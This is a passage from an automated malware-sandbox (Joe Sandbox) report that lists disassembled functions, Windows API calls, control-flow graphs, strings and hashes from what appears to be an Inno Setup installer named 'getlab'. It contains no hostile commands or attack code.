                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0048306C
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483078
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483099
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004830AC
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004830B2
                                                                          • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004830C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                          • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                          • API String ID: 2230631259-2623177817
                                                                          • Opcode ID: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                                          • Instruction ID: af3d4bc633e3fac8e2117acd109dd394a62660f1f52edacbaea6f09291502d38
                                                                          • Opcode Fuzzy Hash: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                                          • Instruction Fuzzy Hash: 9211B69010574194DA117B764C5E76F19888B12F1BF140C3BB880662DBEABD8F45CB2F
                                                                          Function 00468BB0 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1615 468bb0-468be8 call 47bb50 1618 468bee-468bfe call 4788b8 1615->1618 1619 468dca-468de4 call 403420 1615->1619 1624 468c03-468c48 call 4078e4 call 403738 call 42de14 1618->1624 1630 468c4d-468c4f 1624->1630 1631 468c55-468c6a 1630->1631 1632 468dc0-468dc4 1630->1632 1633 468c7f-468c86 1631->1633 1634 468c6c-468c7a call 42dd44 1631->1634 1632->1619 1632->1624 1636 468cb3-468cba 1633->1636 1637 468c88-468caa call 42dd44 call 42dd5c 1633->1637 1634->1633 1639 468d13-468d1a 1636->1639 1640 468cbc-468ce1 call 42dd44 * 2 1636->1640 1637->1636 1656 468cac 1637->1656 1642 468d60-468d67 1639->1642 1643 468d1c-468d2e call 42dd44 1639->1643 1660 468ce3-468cec call 4314f0 1640->1660 1661 468cf1-468d03 call 42dd44 1640->1661 1645 468da2-468db8 RegCloseKey 1642->1645 1646 468d69-468d9d call 42dd44 * 3 1642->1646 1657 468d30-468d39 call 4314f0 1643->1657 1658 468d3e-468d50 call 42dd44 1643->1658 1646->1645 1656->1636 1657->1658 1658->1642 1668 468d52-468d5b call 4314f0 1658->1668 1660->1661 1661->1639 1672 468d05-468d0e call 4314f0 1661->1672 1668->1642 1672->1639
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,00468DCA,?,?,00000001,00000000,00000000,00468DE5,?,00000000,00000000,?), ref: 00468DB3
                                                                          Strings
                                                                          • Inno Setup: Setup Type, xrefs: 00468CC2
                                                                          • %s\%s_is1, xrefs: 00468C2D
                                                                          • Inno Setup: Selected Tasks, xrefs: 00468D1F
                                                                          • Inno Setup: User Info: Serial, xrefs: 00468D95
                                                                          • Inno Setup: No Icons, xrefs: 00468C9B
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468C0F
                                                                          • Inno Setup: Deselected Components, xrefs: 00468CF4
                                                                          • Inno Setup: Icon Group, xrefs: 00468C8E
                                                                          • Inno Setup: Selected Components, xrefs: 00468CD2
                                                                          • Inno Setup: Deselected Tasks, xrefs: 00468D41
                                                                          • Inno Setup: App Path, xrefs: 00468C72
                                                                          • Inno Setup: User Info: Name, xrefs: 00468D6F
                                                                          • Inno Setup: User Info: Organization, xrefs: 00468D82
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1093091907
                                                                          • Opcode ID: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                                          • Instruction ID: 9409bd20b999dcc9be58dd01f280802f9f4acbf4d31626fc1b9235e67c3febe1
                                                                          • Opcode Fuzzy Hash: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                                          • Instruction Fuzzy Hash: B451C430A006489BCB11DB65C9917DEB7F5EF98304F50816FE840A7391EB78AE41CB19
                                                                          Function 0042386C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1833 42386c-423876 1834 42399f-4239a3 1833->1834 1835 42387c-42389e call 41f3bc GetClassInfoA 1833->1835 1838 4238a0-4238b7 RegisterClassA 1835->1838 1839 4238cf-4238d8 GetSystemMetrics 1835->1839 1838->1839 1842 4238b9-4238ca call 408cac call 40311c 1838->1842 1840 4238da 1839->1840 1841 4238dd-4238e7 GetSystemMetrics 1839->1841 1840->1841 1843 4238e9 1841->1843 1844 4238ec-423948 call 403738 call 4062e8 call 403400 call 423644 SetWindowLongA 1841->1844 1842->1839 1843->1844 1856 423962-423990 GetSystemMenu DeleteMenu * 2 1844->1856 1857 42394a-42395d call 424170 SendMessageA 1844->1857 1856->1834 1858 423992-42399a DeleteMenu 1856->1858 1857->1856 1858->1834
                                                                          APIs
                                                                            • Part of subcall function 0041F3BC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                                          • GetClassInfoA.USER32(00400000,00423674), ref: 00423897
                                                                          • RegisterClassA.USER32(00499630), ref: 004238AF
                                                                          • GetSystemMetrics.USER32(00000000), ref: 004238D1
                                                                          • GetSystemMetrics.USER32(00000001), ref: 004238E0
                                                                          • SetWindowLongA.USER32(00410648,000000FC,00423684), ref: 0042393C
                                                                          • SendMessageA.USER32(00410648,00000080,00000001,00000000), ref: 0042395D
                                                                          • GetSystemMenu.USER32(00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423968
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423977
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423984
                                                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000), ref: 0042399A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                          • String ID: t6B
                                                                          • API String ID: 183575631-3178735703
                                                                          • Opcode ID: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                                          • Instruction ID: b8adc5bb76ba60810a7e15457cf144511173abf09441cb7f9a8677178c11600e
                                                                          • Opcode Fuzzy Hash: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                                          • Instruction Fuzzy Hash: 003150B17402006AE710BF699C82F6A37989B14709F60017AFA44EF2D7C6BDED44876D
                                                                          Function 0047C65C Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1972 47c65c-47c6b2 call 42c3f4 call 4035c0 call 47c320 call 4525ac 1981 47c6b4-47c6b9 call 453318 1972->1981 1982 47c6be-47c6cd call 4525ac 1972->1982 1981->1982 1986 47c6e7-47c6ed 1982->1986 1987 47c6cf-47c6d5 1982->1987 1990 47c704-47c72c call 42e38c * 2 1986->1990 1991 47c6ef-47c6f5 1986->1991 1988 47c6f7-47c6ff call 403494 1987->1988 1989 47c6d7-47c6dd 1987->1989 1988->1990 1989->1986 1992 47c6df-47c6e5 1989->1992 1998 47c753-47c76d GetProcAddress 1990->1998 1999 47c72e-47c74e call 4078e4 call 453318 1990->1999 1991->1988 1991->1990 1992->1986 1992->1988 2001 47c76f-47c774 call 453318 1998->2001 2002 47c779-47c796 call 403400 * 2 1998->2002 1999->1998 2001->2002
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(73400000,SHGetFolderPathA), ref: 0047C75E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$imI$shell32.dll$shfolder.dll
                                                                          • API String ID: 190572456-2091577475
                                                                          • Opcode ID: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                                          • Instruction ID: 1bc5907ccbf8c7c126ff73efdb0a93079a3df87e782a300c574b3872d81dfa42
                                                                          • Opcode Fuzzy Hash: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                                          • Instruction Fuzzy Hash: BF311D30A00149DBCB00EFA9D9D29DEB7B5EB44305F61847BE404E7241DB389E45CBAD
                                                                          Function 0040631C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2010 40631c-406336 GetModuleHandleA GetProcAddress 2011 406338 2010->2011 2012 40633f-40634c GetProcAddress 2010->2012 2011->2012 2013 406355-406362 GetProcAddress 2012->2013 2014 40634e 2012->2014 2015 406364-406366 SetProcessDEPPolicy 2013->2015 2016 406368-406369 2013->2016 2014->2013 2015->2016
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                          • API String ID: 3256987805-3653653586
                                                                          • Opcode ID: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                                          • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                          • Opcode Fuzzy Hash: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                                          • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                          Function 00413213 Relevance: 14.6, APIs: 6, Strings: 2, Instructions: 635COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$Prop
                                                                          • String ID: wA$yA
                                                                          • API String ID: 3887896539-1847240991
                                                                          • Opcode ID: f90247c629a947c585d53ebd803f71ac5ff518e129def1d5e0d2b734115b4926
                                                                          • Instruction ID: c74ba7ed2530cb1b13d42f77b59a1a0282e776654e1e26cace8cc99fbade548e
                                                                          • Opcode Fuzzy Hash: f90247c629a947c585d53ebd803f71ac5ff518e129def1d5e0d2b734115b4926
                                                                          • Instruction Fuzzy Hash: E922D06108E3C05FE3279B74896A5D17FA0EE23326B1D45DFC4C28B1A3D61D8A87C71A
                                                                          Function 0042F558 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2154 42f558-42f562 2155 42f564-42f567 call 402d30 2154->2155 2156 42f56c-42f5a9 call 402b30 GetActiveWindow GetFocus call 41ee9c 2154->2156 2155->2156 2162 42f5bb-42f5c3 2156->2162 2163 42f5ab-42f5b5 RegisterClassA 2156->2163 2164 42f64a-42f666 SetFocus call 403400 2162->2164 2165 42f5c9-42f5fa CreateWindowExA 2162->2165 2163->2162 2165->2164 2166 42f5fc-42f640 call 424274 call 403738 CreateWindowExA 2165->2166 2166->2164 2173 42f642-42f645 ShowWindow 2166->2173 2173->2164
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042F587
                                                                          • GetFocus.USER32 ref: 0042F58F
                                                                          • RegisterClassA.USER32(004997AC), ref: 0042F5B0
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F684,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5EE
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F634
                                                                          • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F645
                                                                          • SetFocus.USER32(00000000,00000000,0042F667,?,?,?,00000001,00000000,?,00458172,00000000,0049B628), ref: 0042F64C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                          • String ID: TWindowDisabler-Window
                                                                          • API String ID: 3167913817-1824977358
                                                                          • Opcode ID: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                                          • Instruction ID: 4511064fd05a7bbda13c40d4eeb951e72c3c37d4b9ac5deb9698ad8496ae2c71
                                                                          • Opcode Fuzzy Hash: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                                          • Instruction Fuzzy Hash: B621A171740710BAE220EF61AD43F1A76B8EB14B04F91453BF504AB2E1D7B9AD0586AD
                                                                          Function 004531C4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2174 4531c4-453215 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2175 453217-45321e 2174->2175 2176 453220-453222 2174->2176 2175->2176 2177 453224 2175->2177 2178 453226-45325c call 42e38c call 42e8c0 call 403400 2176->2178 2177->2178
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
                                                                          • Opcode ID: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                                          • Instruction ID: 97fdcfa8d8ba184edd095c4085c6b9ff9a8965db98d5396ade8c15ee503d7826
                                                                          • Opcode Fuzzy Hash: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                                          • Instruction Fuzzy Hash: 5D018870244B05AED701BF73AD02F5A7A58DB0579BF5004BBF81496183D77C4A08CAAD
                                                                          Function 00466FA8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                                            • Part of subcall function 00466EE8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466F80
                                                                            • Part of subcall function 00466EE8: DestroyCursor.USER32(00000000), ref: 00466F96
                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                                          • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467129
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046714F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                          • String ID: c:\directory$shell32.dll
                                                                          • API String ID: 3376378930-1375355148
                                                                          • Opcode ID: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                                          • Instruction ID: 289419416c676a83544b633f3186a9d007cfc28e75d1c6b72818de0571a1fc75
                                                                          • Opcode Fuzzy Hash: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                                          • Instruction Fuzzy Hash: ED515E74604244AFDB11DF65DD85FCFB7A8EB49308F5081B7F40897352D638AE81CA59
                                                                          Function 00430938 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430940
                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043094F
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00430969
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 0043098A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                          • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                          • API String ID: 4130936913-2943970505
                                                                          • Opcode ID: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                                          • Instruction ID: fc358bcdd7e5b0606a48ee3fdcf498d476493da3f5408fce691eb0e46a0d48ea
                                                                          • Opcode Fuzzy Hash: 4892df4f2f1e0b4b8a599102644a6dba2176c7c95c36211ef141ed36876d8ea1
                                                                          • Instruction Fuzzy Hash: D0F082B04583409AE300EB25994271E77D0EF58318F10463FF898A6392D7385900CB6F
                                                                          Function 00454FE4 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200,00000000), ref: 0045518E
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200), ref: 0045519B
                                                                            • Part of subcall function 00454F50: WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                                            • Part of subcall function 00454F50: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                                            • Part of subcall function 00454F50: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                                            • Part of subcall function 00454F50: CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
